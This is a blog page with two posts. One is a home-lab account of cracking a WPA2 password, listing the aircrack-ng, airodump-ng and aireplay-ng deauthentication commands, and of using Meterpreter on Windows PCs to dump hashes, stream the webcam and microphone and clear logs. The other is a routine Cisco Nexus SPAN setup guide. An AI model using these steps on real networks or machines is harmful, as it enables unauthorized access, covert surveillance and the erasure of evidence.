Category: Network

Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff.  So I got some time to play around 🙂 on my home lab. – so here’s the thing:

It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:

airmonng
airmonng start
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security.  I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/  Oh…. and I cleared the logs as I left the scene – all within a couple of hours.

So keep those systems secure and up to date peeps!

Creating a SPAN session on a Nexus 9K

Create SPAN session
=================================
9kswitch# conf t
9kswitch(config)# monitor session 1

Configure destination port (destination cannot be a FEX port or a Port-channel!)
=================================
9kswitch# conf t
9kswitch(config)# interface eth 1/15
9kswitch(config-if)# switchport monitor
9kswitch(config-if)# exit
9kswitch(config)# monitor session 1
9kswitch(config-monitor)# destination interface eth 1/15

Configure source port (or VLAN)
=================================
9kswitch(config-monitor)# source interface eth 1/10
9kswitch(config-monitor)# source interface eth 1/11
or
9kswitch(config-monitor)# source vlan x

Activate a SPAN session
==================================
9kswitch(config)# no monitor session 1 shut

Display SPAN session
==================================
9kswitch# show monitor
or
9kswitch# show monitor session 1

conf t
monitor session 1
exit
int eth 1/15
switchport monitor
exit
monitor session 1
destination int eth 1/15
source int eth 1/10
source int eth 1/11
exit
no monitor session 1 shut

Cisco Nexus 9000: Configuring SPAN